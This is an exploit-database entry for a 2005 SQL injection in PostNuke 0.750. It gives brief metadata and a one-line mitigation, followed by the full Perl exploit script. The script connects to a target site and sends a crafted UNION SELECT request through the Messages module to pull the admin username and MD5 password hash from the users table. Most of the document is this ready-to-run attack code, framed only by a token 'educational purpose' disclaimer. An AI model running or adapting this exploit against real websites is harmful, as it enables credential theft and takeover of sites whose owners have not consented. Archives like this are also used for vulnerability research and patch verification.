PostNuke SQL Injection

vendor:

PostNuke

by:

K-C0d3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PostNuke

Affected Version From: 0.750

Affected Version To: 0.750

Patch Exists: YES

Related CWE: N/A

CPE: a:postnuke:postnuke

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

This exploit allows an attacker to gain access to the admin account of a PostNuke website by exploiting a SQL injection vulnerability. The exploit sends a specially crafted HTTP request to the vulnerable server, which then returns the admin username and MD5 password.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# This tools is only for educational purpose
#
# K-C0d3r a x0n3-h4ck friend !!!
#
# This exploit should give admin nick and md5 password
#
#-=[ PostNuke SQL Injection                     version : x=> 0.750]=-
#-=[                                                               ]=-
#-=[ Discovered by sp3x                                            ]=-
#-=[ Coded by K-C0d3r                                              ]=-
#-=[ irc.xoned.net #x0n3-h4ck to find me   K-c0d3r[at]x0n3-h4ck.org]=-
#
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
#
# !!! NOW IS PUBLIC (6-6-2005) !!!

use IO::Socket;

sub Usage {
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
exit;
}

if (@ARGV < 2)
{
 Usage();
}

if (@ARGV > 2)
{
 Usage();
}

if (@ARGV == 2)
{
$host = @ARGV[0];
$path = @ARGV[1];

print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
print "[+] Connecting to $host\n";

$injection = "$host\/$path?";
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;

print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

# milw0rm.com [2005-06-05]